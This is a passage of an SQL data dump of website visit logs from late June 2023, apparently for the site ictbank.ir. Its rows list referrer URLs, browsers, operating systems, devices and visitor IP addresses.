(34851,'2023-06-25','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','202.21.38.89','000',0,6,0),
(34852,'2023-06-25','https://ictbank.ir/blog','Chrome','Windows','57.0.0.0','desktop','Unknown','','34.228.32.185','000',0,1,0),
(34853,'2023-06-25','https://ictbank.ir/blog','Android Browser','Android','Unknown','mobile:smart','Optimus LTE2','','23.100.19.156','000',0,2,0),
(34854,'2023-06-25','https://ictbank.ir/blog','Chrome','Windows','9.0.0.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(34855,'2023-06-25','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.108','000',0,2,0),
(34856,'2023-06-25','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','74.201.28.5','000',0,1,0),
(34857,'2023-06-25','https://ictbank.ir/blog','Chrome','Windows','91.0.0.0','desktop','Unknown','','172.107.98.151','000',0,2,0),
(34858,'2023-06-25','https://ictbank.ir/blog','Firefox','Windows','104.0','desktop','Unknown','','184.94.240.88','000',0,1,0),
(34859,'2023-06-25','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.11','000',0,2,0),
(34860,'2023-06-25','https://ictbank.ir/hooman/admin/index.php?pid=students','Chrome','Windows','114.0.0.0','desktop','Unknown','','5.237.137.123','000',0,96,0),
(34861,'2023-06-25','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.103','000',0,2,0),
(34862,'2023-06-25','https://ictbank.ir/hooman/admin/','Chrome','OS X','114.0.0.0','desktop','Macintosh','','34.217.18.90','000',0,6,0),
(34863,'2023-06-25','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.195','000',0,8,0),
(34864,'2023-06-25','https://ictbank.ir/hooman/admin/','Chrome','OS X','114.0.0.0','desktop','Macintosh','','5.160.29.66','000',0,41,0),
(34865,'2023-06-25','https://ictbank.ir/blog','Firefox','Windows','81.0','desktop','Unknown','','5.196.176.254','000',0,8,0),
(34866,'2023-06-25','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,2,0),
(34867,'2023-06-25','https://ictbank.ir/blog','Chrome','Windows','94.0.0.0','desktop','Unknown','','195.170.172.128','000',0,7,0),
(34868,'2023-06-25','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.92.234.29','000',0,2,0),
(34869,'2023-06-25','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','128.14.209.46','000',0,1,0),
(34870,'2023-06-25','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','38.128.66.69','000',0,1,0),
(34871,'2023-06-25','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','45.156.129.7','000',0,1,0),
(34872,'2023-06-25','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','194.169.175.34','000',0,1,0),
(34873,'2023-06-25','https://ictbank.ir/hooman/admin/index.php','Chrome','OS X','114.0.0.0','desktop','Macintosh','','89.37.154.135','000',0,7,0),
(34874,'2023-06-25','https://ictbank.ir/blog','Chrome','Windows','11.0.0.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(34875,'2023-06-25','https://ictbank.ir/hooman/admin/index.php?pid=students&student_id=53&func=courses&student_course_registration_id=86&func2=registrations.schedule','Chrome','Windows','114.0.0.0','desktop','Unknown','','5.237.149.63','000',0,152,0),
(34876,'2023-06-25','https://m.wikisonnati.com/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','106.75.138.76','000',0,1,0),
(34877,'2023-06-25','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.31','000',0,2,0),
(34878,'2023-06-25','https://45.92.94.221:443/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.70','000',0,2,0),
(34879,'2023-06-25','https://ictbank.ir/blog','Chrome','Windows','109.0.0.0','desktop','Unknown','','103.187.191.163','000',0,1,0),
(34880,'2023-06-25','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','110.177.180.247','000',0,1,0),
(34881,'2023-06-25','https://ictbank.ir/blog','Safari','iOS','9.0','mobile:smart','iPhone','','139.170.202.59','000',0,1,0),
(34882,'2023-06-25','https://ictbank.ir/blog','Chrome','Windows','69.0.0.0','desktop','Unknown','','171.34.179.97','000',0,1,0),
(34883,'2023-06-25','https://ictbank.ir/blog','Chrome','Windows','69.0.0.0','desktop','Unknown','','58.19.59.247','000',0,1,0),
(34884,'2023-06-25','https://ictbank.ir/blog','Chrome','Android','55.0.0.0','mobile:smart','Nexus 5','','36.32.2.142','000',0,1,0),
(34885,'2023-06-25','https://ictbank.ir/blog','Chrome','Android','55.0.0.0','mobile:smart','Nexus 5','','123.145.32.192','000',0,1,0),
(34886,'2023-06-25','https://ictbank.ir/blog','Chrome','Windows','69.0.0.0','desktop','Unknown','','61.52.86.210','000',0,1,0),
(34887,'2023-06-25','https://ictbank.ir/blog','Chrome','Windows','69.0.0.0','desktop','Unknown','','58.18.161.150','000',0,1,0),
(34888,'2023-06-25','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','45.156.128.32','000',0,1,0),
(34889,'2023-06-25','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','45.156.129.12','000',0,2,0),
(34890,'2023-06-25','https://m.wikisonnati.com/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','106.75.148.194','000',0,1,0),
(34891,'2023-06-25','https://webmail.nikoo-academy.com/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','106.75.154.10','000',0,1,0),
(34892,'2023-06-25','https://ictbank.ir/blog','Firefox','Windows','76.0','desktop','Unknown','','103.124.93.65','000',0,2,0),
(34893,'2023-06-25','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','5.161.186.102','000',0,2,0),
(34894,'2023-06-25','https://ictbank.ir/blog','Firefox','Fedora','95.0','desktop','Unknown','','185.70.95.8','000',0,1,0),
(34895,'2023-06-25','https://ictbank.ir/blog','Chrome','Linux','98.0.0.0','desktop','Unknown','','195.144.21.56','000',0,2,0),
(34896,'2023-06-25','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.80','000',0,1,0),
(34897,'2023-06-25','https://ictbank.ir/blog','Firefox','Fedora','95.0','desktop','Unknown','','185.92.194.80','000',0,1,0),
(34898,'2023-06-25','https://ictbank.ir/blog','Chrome','OS X','17.0.0.0','desktop','Macintosh','','152.32.163.181','000',0,3,0),
(34899,'2023-06-25','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','160.153.154.163','000',0,1,0),
(34900,'2023-06-25','https://m.nikoo-academy.com/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','106.75.188.50','000',0,1,0),
(34901,'2023-06-26','https://ictbank.ir/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','83.97.73.89','000',0,23,0),
(34902,'2023-06-26','https://ictbank.ir/blog','Firefox','Windows','7.0.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(34903,'2023-06-26','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.176','000',0,1,0),
(34904,'2023-06-26','https://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','44.212.26.104','000',0,1,0),
(34905,'2023-06-26','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','74.80.208.13','000',0,21,0),
(34906,'2023-06-26','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','194.169.175.36','000',0,1,0),
(34907,'2023-06-26','https://ictbank.ir/blog','Safari','iOS','14.0.0','mobile:smart','iPhone','','148.72.232.65','000',0,1,0),
(34908,'2023-06-26','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(34909,'2023-06-26','https://ictbank.ir/blog','Chrome','Windows','79.0.0.0','desktop','Unknown','','91.244.172.84','000',0,1,0),
(34910,'2023-06-26','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.31','000',0,8,0),
(34911,'2023-06-26','https://ictbank.ir/blog','Firefox','OS X','68.0','desktop','Macintosh','','193.201.8.40','000',0,1,0),
(34912,'2023-06-26','https://ictbank.ir/blog','Firefox','Windows','81.0','desktop','Unknown','','5.196.176.254','000',0,4,0),
(34913,'2023-06-26','https://ictbank.ir/blog','Firefox','Linux','104.0','desktop','Unknown','','51.159.111.112','000',0,2,0),
(34914,'2023-06-26','https://ictbank.ir/blog','Firefox','OS X','80.0','desktop','Macintosh','','93.174.95.106','000',0,3,0),
(34915,'2023-06-26','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(34916,'2023-06-26','https://ictbank.ir/hooman/admin/','Chrome','OS X','114.0.0.0','desktop','Macintosh','','5.160.29.66','000',0,47,0),
(34917,'2023-06-26','http://ictbank.ir','Chrome','Windows','74.0.0.0','desktop','Unknown','','202.77.48.139','000',0,1,0),
(34918,'2023-06-26','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.44','000',0,4,0),
(34919,'2023-06-26','https://ictbank.ir/blog','Opera','Windows','32.0.0.0','desktop','Unknown','','194.34.132.56','000',0,3,0),
(34920,'2023-06-26','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(34921,'2023-06-26','https://ictbank.ir/hooman/admin/index.php?pid=students','Chrome','Windows','114.0.0.0','desktop','Unknown','','5.237.183.32','000',0,236,0),
(34922,'2023-06-26','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.185.86.145','000',0,2,0),
(34923,'2023-06-26','https://ictbank.ir/blog','Firefox','Windows','114.0','desktop','Unknown','','65.109.210.126','000',0,11,0),
(34924,'2023-06-26','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.140.5','000',0,1,0),
(34925,'2023-06-26','https://45.92.94.221/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','45.40.56.112','000',0,9,0),
(34926,'2023-06-26','https://45.92.94.221:443/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.7','000',0,2,0),
(34927,'2023-06-26','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','128.199.73.106','000',0,1,0),
(34928,'2023-06-26','http://design-arena.ir','Chrome','Windows','74.0.0.0','desktop','Unknown','','49.236.200.213','000',0,1,0),
(34929,'2023-06-26','https://ictbank.ir/hooman/admin/index.php','Chrome','Windows','114.0.0.0','desktop','Unknown','','5.238.108.162','000',0,53,0),
(34930,'2023-06-26','http://ictbank.ir/blog/connection-encryption-in-oracle-database/','Firefox','Linux','102.0','desktop','Unknown','','139.28.218.105','000',0,2,0),
(34931,'2023-06-26','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','45.156.129.2','000',0,2,0),
(34932,'2023-06-26','https://ictbank.ir/blog','Firefox','Linux','102.0','desktop','Unknown','','83.142.55.37','000',0,1,0),
(34933,'2023-06-26','http://www.ictbank.ir','Firefox','Linux','102.0','desktop','Unknown','','85.239.37.13','000',0,1,0),
(34934,'2023-06-26','http://ictbank.ir','Chrome','Windows','74.0.0.0','desktop','Unknown','','208.113.204.51','000',0,2,0),
(34935,'2023-06-26','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','208.80.194.121','000',0,1,0),
(34936,'2023-06-26','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.155','000',0,13,0),
(34937,'2023-06-26','http://ictbank.ir/blog/connection-encryption-in-oracle-database/','Chrome','Linux','103.0.0.0','desktop','Unknown','','146.70.179.109','000',0,2,0),
(34938,'2023-06-26','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.60','000',0,1,0),
(34939,'2023-06-26','https://ictbank.ir/blog','Firefox','Windows','21.0','desktop','Unknown','','52.51.218.89','000',0,1,0),
(34940,'2023-06-26','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','45.79.15.116','000',0,1,0),
(34941,'2023-06-27','https://ictbank.ir/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','83.97.73.89','000',0,5,0),
(34942,'2023-06-27','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.140.5','000',0,2,0),
(34943,'2023-06-27','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.209.162','000',0,3,0),
(34944,'2023-06-27','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','194.169.175.37','000',0,1,0),
(34945,'2023-06-27','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','159.223.59.195','000',0,1,0),
(34946,'2023-06-27','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.44','000',0,2,0),
(34947,'2023-06-27','https://ictbank.ir/blog','Chrome','OS X','19.0.0.0','desktop','Macintosh','','221.199.90.241','000',0,1,0),
(34948,'2023-06-27','https://ictbank.ir/blog','Chrome','Windows','107.0.0.0','desktop','Unknown','','223.83.130.199','000',0,1,0),
(34949,'2023-06-27','https://ictbank.ir/blog','Chrome','Linux','81.0.0.0','desktop','Unknown','','80.94.92.42','000',0,2,0),
(34950,'2023-06-27','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(34951,'2023-06-27','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.46','000',0,8,0),
(34952,'2023-06-27','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','74.80.208.20','000',0,17,0),
(34953,'2023-06-27','https://45.92.94.221:443/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.44','000',0,6,0),
(34954,'2023-06-27','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,12,0),
(34955,'2023-06-27','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.36','000',0,2,0),
(34956,'2023-06-27','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.216.12.0','000',0,2,0),
(34957,'2023-06-27','https://ictbank.ir/blog','Firefox','Windows','79.0','desktop','Unknown','','82.223.55.41','000',0,4,0),
(34958,'2023-06-27','https://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.121','000',0,1,0),
(34959,'2023-06-27','https://ictbank.ir/blog','Chrome','OS X','114.0.0.0','desktop','Macintosh','','37.139.53.18','000',0,1,0),
(34960,'2023-06-27','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','45.156.128.32','000',0,1,0),
(34961,'2023-06-27','https://ns11.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.13','000',0,2,0),
(34962,'2023-06-27','https://www.google.com/','Chrome','Windows','96.0.0.0','desktop','Unknown','','95.38.34.18','000',0,1,0),
(34963,'2023-06-27','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','74.80.208.53','000',0,18,0),
(34964,'2023-06-27','https://ictbank.ir/blog','Chrome','OS X','114.0.0.0','desktop','Macintosh','','89.37.154.135','000',0,4,0),
(34965,'2023-06-27','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.77','000',0,1,0),
(34966,'2023-06-27','https://ictbank.ir/blog','Chrome','Linux','98.0.0.0','desktop','Unknown','','198.20.87.98','000',0,2,0),
(34967,'2023-06-27','https://ictbank.ir/hooman/admin/index.php?pid=students','Chrome','Windows','114.0.0.0','desktop','Unknown','','5.237.182.127','000',0,10,0),
(34968,'2023-06-27','https://ictbank.ir/blog','Chrome','Windows','103.0.0.0','desktop','Unknown','','93.158.91.187','000',0,1,0),
(34969,'2023-06-27','https://ictbank.ir/blog','Chrome','Windows','103.0.0.0','desktop','Unknown','','93.158.91.234','000',0,1,0),
(34970,'2023-06-27','https://ictbank.ir/blog','Chrome','Windows','103.0.0.0','desktop','Unknown','','93.158.91.214','000',0,1,0),
(34971,'2023-06-27','https://ictbank.ir/blog','Chrome','Windows','103.0.0.0','desktop','Unknown','','93.158.91.189','000',0,1,0),
(34972,'2023-06-27','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','162.241.61.180','000',0,1,0),
(34973,'2023-06-27','https://ictbank.ir/blog','Yandex Browser','Windows','22.0.0','desktop','Unknown','','194.99.24.136','000',0,1,0),
(34974,'2023-06-27','http://ictbank.ir','Chrome','Windows','74.0.0.0','desktop','Unknown','','49.236.200.213','000',0,1,0),
(34975,'2023-06-27','http://ictbank.ir','Chrome','Windows','58.0.0.0','desktop','Unknown','','54.36.163.203','000',0,1,0),
(34976,'2023-06-27','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.53','000',0,2,0),
(34977,'2023-06-27','https://ictbank.ir/blog','Chrome','Android','80.0.0.0','mobile:smart','Galaxy S20','','149.56.160.244','000',0,1,0),
(34978,'2023-06-27','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.108','000',0,2,0),
(34979,'2023-06-27','https://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(34980,'2023-06-27','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','202.21.38.89','000',0,2,0),
(34981,'2023-06-27','https://www.sourceweb.claims','Unknown','Unknown','Unknown','bot','Unknown','','18.195.119.148','000',0,1,0),
(34982,'2023-06-27','https://www.sourceweb.claims','Unknown','Unknown','Unknown','bot','Unknown','','3.120.210.246','000',0,1,0),
(34983,'2023-06-27','https://45.92.94.221/blog','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.88.6.178','000',0,1,0),
(34984,'2023-06-27','https://45.92.94.221/blog/','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.88.101.3','000',0,1,0),
(34985,'2023-06-27','https://45.92.94.221/blog','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.254.76.138','000',0,1,0),
(34986,'2023-06-27','https://45.92.94.221/blog/','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.88.93.234','000',0,1,0),
(34987,'2023-06-27','https://45.92.94.221/blog','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.251.14.232','000',0,1,0),
(34988,'2023-06-27','https://45.92.94.221/blog/','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.88.78.6','000',0,1,0),
(34989,'2023-06-27','https://ictbank.ir/blog','Edge','Windows','.0','desktop','Unknown','','5.188.87.37','000',0,1,0),
(34990,'2023-06-27','https://ictbank.ir/hooman/admin/index.php','Chrome','Windows','114.0.0.0','desktop','Unknown','','5.238.38.152','000',0,20,0),
(34991,'2023-06-27','https://ictbank.ir/blog','Firefox','Windows','66.0','desktop','Unknown','','193.201.8.40','000',0,1,0),
(34992,'2023-06-27','https://ictbank.ir/blog','Firefox','Fedora','95.0','desktop','Unknown','','103.121.90.183','000',0,1,0),
(34993,'2023-06-27','https://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','101.68.211.2','000',0,1,0),
(34994,'2023-06-27','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.80','000',0,2,0),
(34995,'2023-06-27','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.190','000',0,2,0),
(34996,'2023-06-27','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','101.34.223.139','000',0,7,0),
(34997,'2023-06-27','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','45.156.128.12','000',0,1,0),
(34998,'2023-06-27','https://ictbank.ir/blog/','Chrome','Windows','103.0.0.0','desktop','Unknown','','136.169.243.170','000',0,4,0),
(34999,'2023-06-27','http://ictbank.ir','Chrome','Windows','74.0.0.0','desktop','Unknown','','5.196.35.145','000',0,3,0),
(35000,'2023-06-27','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.103','000',0,2,0),
(35001,'2023-06-27','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.140.4','000',0,1,0),
(35002,'2023-06-27','http://design-arena.ir','Chrome','Windows','74.0.0.0','desktop','Unknown','','46.37.18.142','000',0,1,0),
(35003,'2023-06-27','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.49','000',0,2,0),
(35004,'2023-06-27','http://design-arena.ir','Chrome','Windows','58.0.0.0','desktop','Unknown','','75.119.200.14','000',0,1,0),
(35005,'2023-06-28','https://ictbank.ir/blog','Opera','Linux','89.0.0.0','desktop','Unknown','','193.202.83.102','000',0,1,0),
(35006,'2023-06-28','http://www.ictbank.ir','Opera','Linux','89.0.0.0','desktop','Unknown','','83.171.227.203','000',0,1,0),
(35007,'2023-06-28','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,18,0),
(35008,'2023-06-28','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.11','000',0,4,0),
(35009,'2023-06-28','https://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.126','000',0,3,0),
(35010,'2023-06-28','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','92.205.0.183','000',0,1,0),
(35011,'2023-06-28','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.46','000',0,6,0),
(35012,'2023-06-28','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','193.201.8.40','000',0,3,0),
(35013,'2023-06-28','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.118','000',0,19,0),
(35014,'2023-06-28','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.165.56.60','000',0,1,0),
(35015,'2023-06-28','https://ictbank.ir/blog','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.141','000',0,1,0),
(35016,'2023-06-28','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(35017,'2023-06-28','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.188','000',0,1,0),
(35018,'2023-06-28','https://ictbank.ir/blog','Chrome','OS X','83.0.0.0','desktop','Macintosh','','54.175.75.183','000',0,3,0),
(35019,'2023-06-28','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.103','000',0,8,0),
(35020,'2023-06-28','https://ictbank.ir/blog','Chrome','Windows','105.0.0.0','desktop','Unknown','','88.99.136.18','000',0,1,0),
(35021,'2023-06-28','http://ictbank.ir','Chrome','Windows','69.0.0.0','desktop','Unknown','','107.189.8.181','000',0,1,0),
(35022,'2023-06-28','https://45.92.94.221:443/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','101.68.211.2','000',0,2,0),
(35023,'2023-06-28','https://ictbank.ir/blog','Firefox','Fedora','90.0','desktop','Unknown','','198.54.133.171','000',0,3,0),
(35024,'2023-06-28','http://design-arena.ir','Chrome','Windows','74.0.0.0','desktop','Unknown','','54.36.163.203','000',0,3,0),
(35025,'2023-06-28','https://l.instagram.com/','Instagram','iOS','287.0.0.0.0','mobile:smart','iPhone 13 Pro Max','','188.132.236.33','000',0,1,0),
(35026,'2023-06-28','https://www.google.com/','Chrome','Windows','114.0.0.0','desktop','Unknown','','117.0.37.85','000',0,1,0),
(35027,'2023-06-28','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','95.216.77.85','000',0,7,0),
(35028,'2023-06-28','https://ictbank.ir/blog','Firefox','Windows','78.0','desktop','Unknown','','212.60.22.188','000',0,1,0),
(35029,'2023-06-28','https://ictbank.ir/blog','Yandex Browser','Windows','21.0.0.0','desktop','Unknown','','72.167.67.188','000',0,2,0),
(35030,'2023-06-28','https://ictbank.ir/blog/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','Chrome','Windows','103.0.0.0','desktop','Unknown','','37.139.53.17','000',0,4,0),
(35031,'2023-06-28','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.140.6','000',0,2,0),
(35032,'2023-06-28','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.44','000',0,2,0),
(35033,'2023-06-28','http://ictbank.ir','Chrome','Windows','74.0.0.0','desktop','Unknown','','211.63.71.72','000',0,2,0),
(35034,'2023-06-28','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','45.156.128.12','000',0,1,0),
(35035,'2023-06-28','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.141','000',0,2,0),
(35036,'2023-06-28','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','194.169.175.34','000',0,1,0),
(35037,'2023-06-28','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.7','000',0,2,0),
(35038,'2023-06-28','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.36','000',0,2,0),
(35039,'2023-06-28','https://ictbank.ir/blog/','Chrome','Windows','103.0.0.0','desktop','Unknown','','136.169.243.170','000',0,4,0),
(35040,'2023-06-28','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','15.206.233.211','000',0,4,0),
(35041,'2023-06-28','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','74.80.208.31','000',0,2,0),
(35042,'2023-06-28','https://ictbank.ir/blog','Chrome','Windows','16.0.0.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(35043,'2023-06-29','https://ictbank.ir/blog','Firefox','OS X','68.0','desktop','Macintosh','','51.254.199.11','000',0,2,0),
(35044,'2023-06-29','https://ictbank.ir/blog','Chrome','Windows','101.0.0.0','desktop','Unknown','','5.188.62.174','000',0,6,0),
(35045,'2023-06-29','https://ictbank.ir/blog','Firefox','Ubuntu','1.0.0','desktop','Unknown','','107.189.2.185','000',0,1,0),
(35046,'2023-06-29','https://ictbank.ir/blog','Firefox','Ubuntu','1.0.0','desktop','Unknown','','185.220.101.54','000',0,1,0),
(35047,'2023-06-29','https://ictbank.ir/blog','Firefox','Ubuntu','1.0.0','desktop','Unknown','','185.220.101.154','000',0,1,0),
(35048,'2023-06-29','https://ictbank.ir/blog','Firefox','Ubuntu','1.0.0','desktop','Unknown','','23.129.64.143','000',0,1,0),
(35049,'2023-06-29','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,14,0),
(35050,'2023-06-29','https://ictbank.ir/blog','Chrome','Linux','86.0.0','desktop','Unknown','','103.56.61.132','000',0,1,0),
(35051,'2023-06-29','https://ictbank.ir/blog','Firefox','Linux','73.0','desktop','Unknown','','159.89.177.115','000',0,1,0),
(35052,'2023-06-29','https://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.121','000',0,1,0),
(35053,'2023-06-29','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(35054,'2023-06-29','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','194.169.175.35','000',0,2,0),
(35055,'2023-06-29','https://ictbank.ir/blog','Firefox','Linux','104.0','desktop','Unknown','','51.158.37.186','000',0,1,0),
(35056,'2023-06-29','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.44','000',0,4,0),
(35057,'2023-06-29','https://ictbank.ir/blog','Yandex Browser','Android','23.0.0.0.0','mobile:smart','Reno 5 Lite','','93.159.230.89','000',0,1,0),
(35058,'2023-06-29','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','194.169.175.37','000',0,1,0),
(35059,'2023-06-29','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','51.38.27.102','000',0,7,0),
(35060,'2023-06-29','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','172.105.50.232','000',0,1,0),
(35061,'2023-06-29','https://ictbank.ir/blog','Safari','OS X','5.0.0','desktop','Macintosh','','52.51.218.89','000',0,1,0),
(35062,'2023-06-29','https://ictbank.ir/blog','Chrome','Linux','12.0.0.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(35063,'2023-06-29','http://ictbank.ir','Chrome','Windows','74.0.0.0','desktop','Unknown','','66.33.212.110','000',0,1,0),
(35064,'2023-06-29','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.53','000',0,2,0),
(35065,'2023-06-29','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','38.68.134.6','000',0,1,0),
(35066,'2023-06-29','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.11','000',0,4,0),
